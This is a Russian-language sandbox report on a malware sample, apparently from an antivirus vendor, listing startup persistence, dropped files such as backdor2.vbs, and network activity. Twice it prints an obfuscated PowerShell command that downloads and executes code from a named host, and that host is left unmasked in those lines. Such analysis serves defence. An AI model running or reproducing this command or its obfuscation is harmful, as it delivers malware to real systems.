Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- %APPDATA%\microsoft\windows\start menu\programs\startup\c.exe
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (New-Object('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://concretium.pt/d')
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\backdor2.vbs
- %ALLUSERSPROFILE%\dllhost.exe
Сетевая активность
Подключается к
- 'co###etium.pt':80
- 'co###etium.pt':443
- 'x1.#.lencr.org':80
- 'r3.#.lencr.org':80
- 'oc##.thawte.com':80
TCP
Запросы HTTP GET
- http://co###etium.pt/d
- http://co###etium.pt/f
- http://x1.#.lencr.org/
- http://r3.#.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRI2smg%2ByvTLU%2Fw3mjS9We3NfmzxAQUFC6zF7dYVsuuUAlA5h%2BvnYsUwsYCEgPGL0Jc8%2FVirNT9VKiVMlf%2FZg%3D%3D
- http://oc##.thawte.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD%2Fyl6nWPkczAQUe1tFz6%2FOy3r9MZIaarbzRutXSFACEEeXTXhzpbyrDS%2BzcBkvzl4%3D
Другие
- 'co###etium.pt':443
UDP
- DNS ASK co###etium.pt
- DNS ASK x1.#.lencr.org
- DNS ASK r3.#.lencr.org
- DNS ASK oc##.thawte.com
Другое
Создает и запускает на исполнение
- '%APPDATA%\microsoft\windows\start menu\programs\startup\c.exe'
- '<SYSTEM32>\wscript.exe' "%APPDATA%\backdor2.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (New-Object('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://concretium.pt/d')' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\dw20.exe' -x -s 400
